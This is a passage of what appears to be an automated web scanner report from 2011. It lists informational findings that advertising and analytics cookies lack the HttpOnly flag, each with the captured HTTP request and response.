GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:2925993182975414771 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; PUBRETARGET=78_1409703834

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:31 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:48:03 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html


12.49. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097673_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:33 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:33 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 295

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=' width='300' heigh
...[SNIP]...

12.50. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051; uid=1_1315097284_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:00 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cre=1_1315097700_34021:68285:2:0:415_34024:68283:2:649:741_34024:68292:2:119537:119619_34023:68293:1:120250:120250; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: uid=1_1315097700_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: kwd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: scg=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: ppd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: act=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:55:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5492

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

12.51. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=99999&guidm=1:1765ifu1akkc79&bnum=15702 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=/nsYO9aFHYIiGW8sQdwSkaYxSKMCdbdBwB; GUID=MTMxNTA5NzA4NzsxOjE3NjVpZnUxYWtrYzc5OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:06:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=b8sYO9aFHYIiGT8sQdwSkaMxSKMCdbdBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/
Set-Cookie: GUID=MTMxNTA5ODM5NTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 04 Sep 2011 02:06:35 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

12.52. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nmsacramento.112.2o7.net
Path:   /b/ss/nmsacramento/1/H.20.3/s83257504000794

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/nmsacramento/1/H.20.3/s83257504000794?AQB=1&ndh=1&t=3/8/2011%2019%3A48%3A59%206%20300&pageName=Product%3A%20Blogs%3A%20Moveable%20Type%3A%20Sacramento%20Bee%20--%20The%20State%20Worker&g=http%3A//blogs.sacbee.com/the_state_worker/%23navlink%3Dnavdrop&r=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&cc=USD&ch=Sacramento%20Bee%3A%20Product%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&server=blogs.sacbee.com&events=event7&c1=http%3A//blogs.sacbee.com/the_state_worker/&h1=SAC%7CSacramento%20Bee%7CNews%7CState%7CGovtPolitics%7C%7C%7CProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&c3=*Product&v3=Cal%20Monthly%20Visit%20Number%3A%201&c4=Sacramento%20Bee%3A%20Moveable%20Type%3A%20Staff%3A%20&v4=Product%3A%20Blogs%3A%20Moveable%20Type%3A%20Sacramento%20Bee%20--%20The%20State%20Worker&c5=.threshold&c6=SAC%7CSacramento%20Bee%7CNews%7CState%7CGovtPolitics%7C%7C%7CProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&c13=Unknown&c20=%7CU%3A%20Sacramento%20Bee%3A%20Product%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker%20%3A%20blogs.sacbee.com&c33=8%3A30PM&c34=Saturday&c39=%20%23navlink%3Dnavdrop&c42=Cal%20Monthly%20Visit%20Number%3A%201&c43=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal&c44=Sto%3A%203000px%20%3A%203sc%20%3A%20100%25&c48=YTextAd%3A%20*Product%3Ablogs.sacbee.com%3AProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal&pidt=1&oid=http%3A//blogs.sacbee.com/the_state_worker/%23navlink%3Dnavdrop&ot=A&AQE=1 HTTP/1.1
Host: nmsacramento.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:04:36 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bax7Fmox7Emaibxxc=[CS]v4|27316752051606A2-400001778004310F|4E62CAD6[CE]; Expires=Fri, 2 Sep 2016 01:04:36 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 01:04:36 GMT
Last-Modified: Mon, 05 Sep 2011 01:04:36 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E62CEA4-0D28-2AB4C075"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Location: http://b.scorecardresearch.com/r?c2=6035363&d.c=gif&d.o=nmsacramento&d.x=62294659&d.t=page&d.u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop
xserver: www388
Content-Length: 0
Content-Type: text/plain


12.53. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-15.js?cb=0.3047261026222259 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:59 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111960; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3214998.js^2^1315097284^1315097639&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 00:53:59 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1133

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3214998"
...[SNIP]...

12.54. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:23 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111876; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3214995.js^3^1315096957^1315097723; expires=Sun, 11-Sep-2011 00:55:23 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1228

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

12.55. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOM9CLgIMVZ94v40baTDzlRIkdUWSQGfFxfA6hPpUKyeNNoj0iIN6Cv9sUGvLEXvKAFu9JT7uIABOODftm+QaDSbsuf25QFhAJtgIo+GwOzrVo4YkL0xbKLuQiu28WRitUy3Kb67rhK+xW853LY2RBECs8dSNYOibsRLGdMUdsI2f//Emd6k6iE1p2Wou0rWthgALXeX8ILkdmFAdhV3cQvpFqMGLq/eFx91Js8rLMz0cCNgkRarHvfvZ2ZEHYUfwWV/ukw==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:52:30 GMT

GIF89a.............!.......,...........D..;

12.56. http://pix04.revsci.net/D08734/a1/0/3/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0/FLgIMlrE7uk0GmV2eAbqnnz9mBC2OsJRojxDyMaIk9TEJ3YH2aKvvUGIZ/u6UZUfRMVa6yiD7njMXjPX3N4DMhY2ZviRGuNIpq5mAQ5cYacVa3palkMmqiTA44pzy0TsSp9dZGV0wREhmZA++cX1MA6EP1ziTd85x9KCxFvIWPIoOtMDGZLcM0Kdb1Un8sm56weCl5qnY0SxvtyYPOEr5SCNdUsKIvYBTSfQNKKkClanTYJF2y5vVLyjL4pXJ2Go=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvMC8OYS5rXbhG0229qE0ZZfVJSgtZ3qm5UxlJJg5z0SgJjDXMFNBaSH5FXKC5uMqMAYe3LnBJoN6KPJ5HmNpTftzasLOHbXUlexEySdBWwp2Urdu/CXqTkn9cRAWShk8yvFMXXiZeKesq7T/19NheQTJDBBTk2qlhMbrFQpzyNaoubYDZepM0IRpzBbvFPy+RadE3K99sIyt19cE/FUnJXUWZ3rLpRhaqLQCuQnEUYKNgfxIroIgJOs97SEJzE5B8ZRKDjSjhO2Ul6pM1TT9m9fBJkQqq/I7he/sHSigrXjyTu/VjAn9g/UmRqoEMBmneape7UJpZttpKR94xyX4KIDp3dXMB/aMPHiYrjInN8zABRWWvjEldLk+gLcPrnIyAg9jsTsxqTXRWlJxdEhIXhBkuzmqecbK9Uol+ctG7vC2Di7U7vzvvmCl0KqyGN1s7jkATO13CT2AfTAj/2luWCZVEmru9XxLnzj8fVJ5qz2UjxOsOlVzXP1yaE6Yyz1q1bKnPVjC0z3RzAXYKtpBi4m1d1V4ps/12UOJl01RfH9Gv1ghVttQC7jd7y5eMBOdQpwlmW8m90g8peBVGtUjfGGcW+RMFhTBwciO3VAk3eLwGXIswRNpdrTYdgOLvqVAdHjKkRvS4u1c46i99S30PU14kF4lRsnIfXwUNmI8cxApAit9XGXI5hLKF//4eAsPFdcUdKLGku2Vyx3spIyCzJrke3Zm1lmWoeTZKTTn/dXO0VEg7yML/K